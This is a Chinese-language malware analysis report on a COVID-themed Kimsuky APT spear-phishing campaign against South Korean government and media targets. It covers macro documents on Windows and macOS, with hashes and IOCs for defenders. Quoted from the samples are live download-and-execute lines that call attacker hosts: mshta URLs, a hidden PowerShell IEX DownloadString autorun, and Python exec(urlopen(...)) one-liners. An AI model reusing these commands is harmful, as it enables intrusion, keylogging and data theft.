Kimsuky APT組織利用疫情話題針對南韓進行雙平臺的攻擊活動的分析
# Kimsuky APT組織利用疫情話題針對南韓進行雙平臺的攻擊活動的分析
一.前言
kimsuky APT組織(又名Mystery Baby, Baby Coin, Smoke Screen, BabyShark, Cobra Venom) ,該組織一直針對於韓國的智囊團,政府組織,新聞組織,大學教授等等進行活動.並且該組織擁有windows平臺的攻擊能力,載荷便捷,階段繁多。並且該組織十分活躍.其載荷有帶有漏洞的hwp檔案,惡意宏檔案,釋放載荷的PE檔案等
近日,隨著海外病例的增加,使用新型冠狀病毒為題材的攻擊活動愈來愈多.例如:海蓮花APT組織透過白加黑的手段向中國的政府部門進行魚叉投遞,摩訶草APT組織冒充我國的重點部門針對政府和醫療部門的攻擊活動,毒雲藤和藍寶菇組織透過釣魚的方式竊取人員的郵箱密碼,藉以達到竊密或者是為下一階段做準備的目的以及蔓靈花組織繼續採用SFX文件的方式對我國重點設施進行投放.
同時,在朝鮮半島的爭奪也隨之展開.Gcow安全團隊追影小組在日常的檔案監控之中發現名為kimsukyAPT組織採用郵件魚叉的方式針對韓國的新聞部門,政府部門等進行攻擊活動,並且在此次活動之中體現出該組織在攻擊過程中使用輕量化,多階段指令碼載荷的特點.並且在本次活動中我們看到了該組織使用python針對MacOS平臺進行無檔案的攻擊活動.
下面筆者將從攻擊Windows平臺的樣本以及攻擊MacOs平臺的樣本進行分析
二.Windwos平臺樣本分析:
1.코로나바이러스 대응.doc(冠狀病毒反應.doc)
0x00.樣本資訊:
| 樣本資訊 | 코로나바이러스 대응(冠狀病毒反應) |
|---|---|
| 樣本名稱 | 코로나바이러스 대응.doc(冠狀病毒反應.doc) |
| 樣本MD5 | A9DAC36EFD7C99DC5EF8E1BF24C2D747 |
| 樣本SHA-1 | CBB8985404281455BBCF02354060FB1E7576D4C2 |
| 樣本SHA-256 | 2CD5F1852AC6D3ED481394EA0ABC49F16789C12FB81BCDF9988762730FB0AA8F |
| 利用方法 | 宏 |
| 樣本型別 | Microsoft Word 2007+ |
| 樣本大小 | 81.13 KB |
| 最初上傳時間 | 2020-02-27 08:52:50 |
該樣本利用社會工程學的辦法,誘使目標點選“啟用內容”來執行宏的惡意程式碼。啟用宏後顯示的正文內容。透過谷歌翻譯,提取到幾個關鍵詞:新型冠狀病毒
可以看出,這可能是針對韓國政府發起的一次攻擊活動。
攻擊者透過魚叉郵件附件的方式將惡意載荷投遞給受害目標
0x01. 樣本分析
利用olevba工具提取的宏程式碼如下:
其將執行的命令透過hex編碼的形式在宏裡面自己解碼後隱藏執行
所執行的命令為:
mshta http://vnext.mireene.com/theme/basic/skin/member/basic/upload/search.hta /f
search.hta
其主要內嵌的是vbs程式碼,請求URL以獲取下一段的vbs程式碼,並且執行獲取到的vbs程式碼
URL地址為:http://vnext.mireene.com/theme/basic/skin/member/basic/upload/eweerew.php?er=1
1.vbs
下一段的vbs程式碼就是其偵查者的主體程式碼:
1.資訊收集部分:
收集本機名以及本機所在域的名稱,ip地址,使用者名稱稱, %programfiles%下的檔案, %programfiles% (x86)下的檔案,安裝軟體資訊,開始欄的專案,最近開啟的專案,程式列表,系統版本資訊,set設定資訊,遠端桌面連線資訊, ,arp資訊, %appdata%\Microsoft下所有檔案以及子檔案資訊,文件資料夾資訊,下載檔案資訊,powershell資料夾下的檔案資訊,磁碟機代號資訊,宏的安全性資訊,outlook資訊等等
2.新增計劃任務以佈置下一階段的載荷:
偽裝成Acrobat更新的任務
執行命令: mshta http://vnext.mireene.com/theme/basic/skin/member/basic/upload/cfhkjkk.hta
獲取當前時間,延遲後執行schtasks創造該計劃任務
cfhkjkk.hta
和search.hta一樣,也是一樣的中轉的程式碼,URL為:http://vnext.mireene.com/theme/basic/skin/member/basic/upload/eweerew.php?er=2
2.vbs
其同樣也是vbs檔案.其主要的功能是檢視%Appdata%\Windows\desktop.ini是否存在,如果存在則利用certutil -f -encode對檔案進行編碼並且輸出為%Appdata%\Windows\res.ini,並且從URL地址下載http://vnext.mireene.com/theme/basic/skin/member/basic/upload/download.php?param=res1.txt編碼後的powershell命令隱藏執行,執行成功後刪除Appdata%\Windows\desktop.ini.並且從URL地址下載http://vnext.mireene.com/theme/basic/skin/member/basic/upload/download.php?param=res2.txt編碼後的powershell命令隱藏執行.
res1.txt
該powershell命令主要功能就是讀取Appdata%\Windows\res.ini檔案裡的內容,再組成HTTP報文後利用UploadString上傳到C2,C2地址為:http://vnext.mireene.com/theme/basic/skin/member/basic/upload/wiujkjkjk.php
res2.txt
該powershell命令主要功能是透過對比按鍵ASCII碼值記錄資訊
我們可以看到被黑的站點是一個購物平臺,攻擊者應該入侵這個購物平臺後把相應的惡意載荷掛到該網站.
此外我們透過比較相同的宏程式碼發現了其一個類似的樣本
2.비건 미국무부 부장관 서신 20200302.doc(美國國務卿素食主義者20200302.doc)
0x00.樣本資訊
| 樣本資訊 | 비건 미국무부 부장관 서신 20200302(美國國務卿素食主義者20200302) |
|---|---|
| 樣本名稱 | 비건 미국무부 부장관 서신 20200302.doc(美國國務卿素食主義者20200302.doc) |
| 樣本MD5 | 5F2D3ED67A577526FCBD9A154F522CCE |
| 樣本SHA-1 | 15042D5B394E4867014525276FCBA54C52208B8B |
| 樣本SHA-256 | 7C0F8D6CF4F908CCE8B7F65F2B5EE06A311D28EE6D8F1B32E90AF4D08C2AB327 |
| 利用方法 | 宏 |
| 樣本型別 | Microsoft Word 2007+ |
| 樣本大小 | 85.67 KB |
| 最初上傳時間 | 2020-03-03 04:20:21 |
該樣本利用社會工程學的辦法,誘使目標點選“啟用內容”來執行宏的惡意程式碼。啟用宏後顯示的正文內容。透過谷歌翻譯,提取到幾個關鍵詞:朝鮮半島 政策。
可以看出,這可能是針對韓國政府機構發起的一次攻擊活動。
0x01 樣本分析
其與上文所述相同不過,本樣本執行的命令是:
mshta http://nhpurumy.mireene.com/theme/basic/skin//member/basic/upload/search.hta /f
相同的中轉search.hta
中轉地址為:http://nhpurumy.mireene.com/theme/basic/skin/member/basic/upload/eweerew.php?er=1
其執行的vbs程式碼與上文類似,在這裡就不做贅述了.不過其計劃任務所執行的第二部分hta的url地址為:http://nhpurumy.mireene.com/theme/basic/skin/member/basic/upload/cfhkjkk.hta
之後的部分程式碼與上文相同,不過其C2的地址為nhpurumy.mireene.com。在此就不贅述了。
被入侵的網站可能是一個廣告公司:
3.붙임. 전문가 칼럼 원고 작성 양식.doc(附上.專家專欄手稿表格.doc)
0x01文件資訊:
樣本資訊:
| 樣本資訊 | 붙임. 전문가 칼럼 원고 작성 양식(附上.專家專欄手稿表格) |
|---|---|
| 檔名稱 | 붙임. 전문가 칼럼 원고 작성 양식.doc |
| 樣本MD5 | 07d0be79be38ecb8c7b1c80ab0bd8344 |
| 樣本SHA1 | 3acfda840986f215bec88cefa0dfb34b44750508 |
| 樣本SHA256 | 1fcd9892532813a27537f4e1a1c21ec0c110d6b3929602750ed77bbba7caa426 |
| 利用方法 | 宏 |
| 樣本型別 | Microsoft Word 2007+ |
| 樣本大小 | 112.96KB |
| VT最初上傳時間 | 2020-03-18 01:47:59 |
該樣本利用社會工程學的辦法,誘使目標點選“啟用內容”來執行宏的惡意程式碼。啟用宏後顯示的正文內容。透過谷歌翻譯,提取到幾個關鍵詞:稿件、專家專欄。
可以看出,這可能是針對韓國新聞機構發起的一次攻擊活動。
0x02 惡意宏分析
利用olevba工具提取的宏程式碼如下:
顯示文件的內容:
隱藏執行powershell.exe程式碼讀取%TEMP%\bobo.txt的內容,並且使用iex執行
Bobo.txt內容
從http://mybobo.mygamesonline.org/flower01/flower01.ps1上下載第二段powershell載荷flower01.ps1並且利用iex記憶體執行
第二段powershell載荷如圖所示:
0x03 惡意powershell分析
Powershell後門配置資訊:
寫入登錄檔啟動項,鍵名: Alzipupdate,鍵值:
cmd.exe /c powershell.exe -windowstyle hidden IEX (New-Object System.Net.WebClient).DownloadString('http://mybobo.mygamesonline.org/flower01/flower01.ps1')
開機啟動就遠端執行本ps1檔案
收集資訊:最近使用的專案(檔案),%ProgramFiles%以及C:\Program Files (x86)下的檔案,系統資訊,當前程式資訊
將這些結果寫入%Appdata%\flower01\flower01.hwp中
Flower01.hwp內容:
將收集到的資訊迴圈上傳到C2並且接收回顯執行
上傳函式:
將資料上傳到http://mybobo.mygamesonline.org/flower01/post.php
下載函式:
請求URL地址:http://mybobo.mygamesonline.org/flower01/flower01.down獲得
第二階段被加密的載荷,解密後透過新增程式碼塊以及新建工作的方式指行第二段載荷
執行完畢後向C2地址請
求:"http://mybobo.mygamesonline.org/flower01/del.php?filename=flower01"標誌載荷已經執行成功
為了方便各位看官理解,刻意繪製了兩張流程圖描述該後門的情況
圖一如下: 是第三個樣本的流程圖 全過程存在一個惡意檔案落地.
圖二如下: 是前兩個樣本的流程圖 全過程無任何惡意檔案落地
三.MacOS平臺的樣本分析:
1.COVID-19 and North Korea.docx(COVID-19與朝鮮.docx)
0x00. 樣本資訊
| 樣本資訊 | COVID-19 and North Korea(COVID-19與朝鮮) |
|---|---|
| 樣本名稱 | COVID-19 and North Korea.docx |
| 樣本MD5 | A4388C4D0588CD3D8A607594347663E0 |
| 樣本SHA-1 | B066369BBD48B7858F2C1EED1E78D85C8AE4CDB6 |
| 樣本SHA256 | 7D2B9F391588CC07D9BA78D652819D32D3D79E5A74086B527C32126AD88B5015 |
| 利用方式 | 遠端模板注入 + 宏 |
| 樣本型別 | Microsoft Word 2007+ |
| 樣本大小 | 220.16 KB (225448 bytes) |
| VT最初上傳時間 | 2020-03-19 11:04:09 |
0x01 樣本分析
該樣本是docx檔案,攻擊者運用社會工程學的手法,設定了一張在MAC系統啟動宏文件的圖片,來誘導受害者點選啟動宏,當受害者啟動宏後該樣本就會移除圖片顯示出文件的內容
由此可見,我們可以看到該樣本與新型冠狀病毒的話題有關,可能針對的是韓國的政府機構
該樣本利用遠端模板注入技術對遠端模板進行載入
遠端模板URL:"http://crphone.mireene.com/plugin/editor/Templates/normal.php?name=web"
宏程式碼會將之前遮蓋的部分顯示,用以迷惑受害者,相關程式碼:
該樣本會判斷是否是MAC系統,若是MAC系統就會執行python命令下載第一階段的python程式碼
命令為:
python -c exec(urllib2.urlopen(urllib2.Request('http://crphone.mireene.com/plugin/editor/Templates/filedown.php?name=v1')).read())
第一階段的python程式碼主要起到一箇中轉的作用
其會執行如下程式碼去載入第二階段的python程式碼:
urllib2.urlopen(urllib2.Request('http://crphone.mireene.com/plugin/editor/Templates/filedown.php?name=v60')).read()
第二段python程式碼類似於一個偵察者:
a.收集資訊
其會收集系統位數資訊,系統資訊,所安裝的APP列表, 檔案列表, 下載檔案列表, 磁碟機代號資訊等,並且將這些資料寫入對應的txt檔案中於惡意樣本所創造的工作目錄下
b.打包所收集的資訊
首先先刪除backup.rar檔案,再將工作目錄下的所有txt檔案利用zip -m -z命令進行打包,輸出為backup.rar檔案
c.將收集的資訊回傳到C2
透過建立Http連結,將rar的資料組成報文,傳送到C2: http://crphone.mireene.com/plugin/editor/Templates/upload.php
d.向C2請求獲取新的python程式碼
更新程式碼:
urllib2.urlopen(urllib2.Request('http://crphone.mireene.com/plugin/editor/Templates/filedown.php?name=new')).read()
從http://crphone.mireene.com/plugin/editor/Templates/filedown.php?name=new獲取新的Python載荷
其創造一個執行緒,迴圈執行收集機器資訊並且上傳,不斷向C2請求執行新的python程式碼,中間休息300秒,這也解釋了為什麼在打包資訊的時候需要先刪除backup.rar
從本次C2的域名: crphone.mireene.com來看,應該是一個賣智慧手機的網站
為了方便各位看官理解,筆者繪製了一張流程圖:
四.關聯與總結:
1.關聯
(1).組成上線報文的特徵
在kimsuky APT組織之前的樣本中所組成的上線報文中含有類似於7e222d1d50232以及WebKitFormBoundarywhpFxMBe19cSjFnG的特徵上線字元
WebKitFormBoundarywhpFxMBe19cSjFnG:
7e222d1d50232:
(2).資訊收集程式碼相似性
在kimsuky APT組織之前的樣本中,我們發現了該組織在進行windows平臺下的資訊收集程式碼存在很大的相似性.比如收集資訊所使用的命令,包含了上文所提到的各類資訊收集的內容.雖然在較新的時候做了簡化.但是依舊可以反映出二者的同源性
2.總結
kimsukyAPT組織是值得關注的威脅者
Kimsuky APT組織作為一個十分活動的APT組織,其針對南韓的活動次數也愈來愈多,同時該組織不斷的使用hwp檔案,釋放誘餌文件可執行檔案(scr),惡意宏文件的方式針對Windows目標進行相應的攻擊.同時惡意宏文件還用於攻擊MacOs目標之中,這與相同背景的Lazarus組織有一定的相似之處,該組織擁有了針對windows,MacOs兩大平臺的攻擊能力。日後說不一定會出現Andorid端的攻擊框架。
同時該組織的載荷也由之前的PE檔案載荷逐漸變為多級指令碼載荷,這不僅僅增加了其靈活性,而且有助於其逃過部分防毒軟體的查殺.但是其混淆的策略不夠成熟,所以其對規避殺軟的能力還是較弱。
並且該組織的後門逐漸採取少落地或者不落地的方式,這在一定層面上加大了檢測的難度.但是其沒有考慮到AMSI以及scriptblock等.所以防毒軟體依舊是可以進行防護的.
最後,該組織的成員應該是透過入侵該網站後在該網站下掛上了部署C2以做好白名單策略,減少被目標防護軟體的檢測的機率.比如在這次活動中,其入侵帶有動態域名的網站將載荷不至於上面。同時該稅法也在之前的活動中有所體現。
正如一開始所講的那樣該組織是一個很值得關注的威脅者.不過該組織現在仍然處於上身階段,其不斷進行自我的更新以及廣撒網式的大量投遞樣本也表現出其的不成熟性,但這更需要我們保持警惕.以及與之有相同背景的Group123以及KonniAPT組織.
五.IOCs:
MD5:
757a71f0fbd6b3d993be2a213338d1f2
5f2d3ed67a577526fcbd9a154f522cce
07D0BE79BE38ECB8C7B1C80AB0BD8344
A4388C4D0588CD3D8A607594347663E0
5EE1DE01EABC7D62DC7A4DAD0B0234BF
1B6D8837C21093E4B1C92D5D98A40ED4
A9DAC36EFD7C99DC5EF8E1BF24C2D747
163911824DEFE23439237B6D460E8DAD
9F85509F94C4C28BB2D3FD4E205DE857
5F2D3ED67A577526FCBD9A154F522CCE
C2:
vnext[.]mireene[.]com
nhpurumy[.]mireene[.]com
mybobo[.]mygamesonline[.]org
crphone[.]mireene[.]com
URL:
vnext[.]mireene[.]com/theme/basic/skin//member/basic/upload/search[.]hta
vnext[.]mireene[.]com/theme/basic/skin/member/basic/upload/eweerew[.]php?er=1
vnext[.]mireene[.]com/theme/basic/skin/member/basic/upload/cfhkjkk[.]hta
vnext[.]mireene[.]com/theme/basic/skin/member/basic/upload/eweerew[.]php?er=2
vnext[.]mireene[.]com/theme/basic/skin/member/basic/upload/download[.]php?param=res1.txt
vnext[.]mireene[.]com/theme/basic/skin/member/basic/upload/download[.]php?param=res2.txt
vnext[.]mireene[.]com/theme/basic/skin/member/basic/upload/wiujkjkjk[.]php
nhpurumy[.]mireene[.]com/theme/basic/skin//member/basic/upload/search[.]hta
nhpurumy[.]mireene[.]com/theme/basic/skin/member/basic/upload/eweerew[.]php?er=1
nhpurumy[.]mireene[.]com/theme/basic/skin/member/basic/upload/cfhkjkk[.]hta
nhpurumy[.]mireene[.]com/theme/basic/skin/member/basic/upload/eweerew[.]php?er=2
/nhpurumy[.]mireene[.]com/theme/basic/skin/member/basic/upload/download[.]php?param=res1.txt
nhpurumy[.]mireene[.]com/theme/basic/skin/member/basic/upload/download[.]php?param=res2.txt
nhpurumy[.]mireene[.]com/theme/basic/skin/member/basic/upload/wiujkjkjk[.]php
crphone[.]mireene[.]com/plugin/editor/Templates/normal[.]php?name=web
crphone[.]mireene[.]com/plugin/editor/Templates/filedown[.]php?name=v1
crphone[.]mireene[.]com/plugin/editor/Templates/filedown[.]php?name=v60
crphone[.]mireene[.]com/plugin/editor/Templates/upload[.]php
crphone[.]mireene[.]com/plugin/editor/Templates/filedown[.]php?name=new
crphone[.]mireene[.]com/plugin/editor/Templates/filedown[.]php?name=normal
mybobo[.]mygamesonline[.]org/flower01/post[.]php
mybobo[.]mygamesonline[.]org/flower01/flower01[.]down
mybobo[.]mygamesonline[.]org/flower01/del[.]php?filename=flower01
mybobo[.]mygamesonline[.]org/flower01/flower01.ps1
六.參考連結:
https://mp.weixin.qq.com/s/ISVYVrjrOUk4bzK5We6X-Q
https://blog.alyac.co.kr/2779
關注公眾號獲取更多技術文章
相關文章
- 刺向巴勒斯坦的致命毒針——雙尾蠍 APT 組織的攻擊活動分析與總結APT
- 南亞APT組織Bitter正在針對中國的核能機構進行網路攻擊APT
- 美人魚(Infy)APT組織的歸來——使用最新的Foudre後門進行攻擊活動的分析APT
- 疑似APT組織針對多吉幣關注者進行魚叉式定向攻擊APT
- Kimsuky APT組織使用新型的AppleSeed Android元件偽裝成安全軟體對韓特定目標進行攻擊APTAPPAndroid元件
- APT組織Lorec53(洛瑞熊)發動多輪針對烏克蘭的網路攻擊活動APT
- FireEye遭APT攻擊?!針對企業的APT攻擊是如何發生的?APT
- 隱寫術、小火龍與AgentVX:APT組織Evilnum新攻擊活動詳細分析APT
- 烈火燒不盡的“惡性毒草”—— 摩訶草APT組織的攻擊活動APT
- SWEED駭客組織攻擊活動分析報告
- 伸向中亞地區的觸手——DustSquad APT組織針對烏茲別克的活動分析APT
- 微軟稱阻止了黎巴嫩黑客組織對以色列的攻擊活動微軟黑客
- ROVNIX攻擊平臺分析 -利用WordPress平臺傳播的多外掛攻擊平臺
- 拙劣至極!南亞APT組織借新冠疫情對我國醫療機構發起定向攻擊!APT
- 追溯朝鮮APT組織Lazarus的攻擊歷程APT
- APT組織檔案館|2021年度APT組織活動態勢分析APT
- 深入剖析某國外組織針對中國企業的APT攻擊(CVE-2015-8651)APT
- 針對以色列和巴勒斯坦的apt式攻擊APT
- 針對巴基斯坦的某APT活動事件分析APT事件
- 利用Office宏及Powershell的針對性攻擊樣本分析
- 利用Office巨集及Powershell的針對性攻擊樣本分析
- 對某單位的 APT 攻擊樣本分析APT
- 重要揭秘!LAZARUS組織最新活動中的新型攻擊技術
- 境外“暗駭客棧”組織對國內企業高管發起APT攻擊APT
- 安全公司FireEye再被攻擊!劍指俄羅斯APT組織APT
- 一例針對中國政府機構的準APT攻擊中所使用的樣本分析APT
- 谷歌揭露兩個朝鮮黑客組織的網路攻擊活動谷歌黑客
- 針對Alexa Top 100站點進行的一次釣魚攻擊分析
- 遊蕩於中巴兩國的魅影——響尾蛇(SideWinder) APT組織針對巴基斯坦最近的活動以及2019年該組織的活動總結IDEAPT
- 基於上下文感知計算的APT攻擊組織追蹤方法APT
- 小心Excel文件,TA505黑客組織利用其執行攻擊Excel黑客
- 利用JSONP進行水坑攻擊JSON
- 黑客組織是如何針對美軍採取行動的?黑客
- APT攻擊APT
- 獨家揭祕“拍拍熊”(APT-C-37):持續對某武裝組織發起攻擊!APT
- 德國官員稱俄羅斯黑客組織APT28去年對其發動網路攻擊黑客APT
- 【最全】針對工業行業的勒索攻擊調研行業
- 看好你的門-XSS攻擊(2)-利用反射型XSS漏洞 進行鍼對性攻擊反射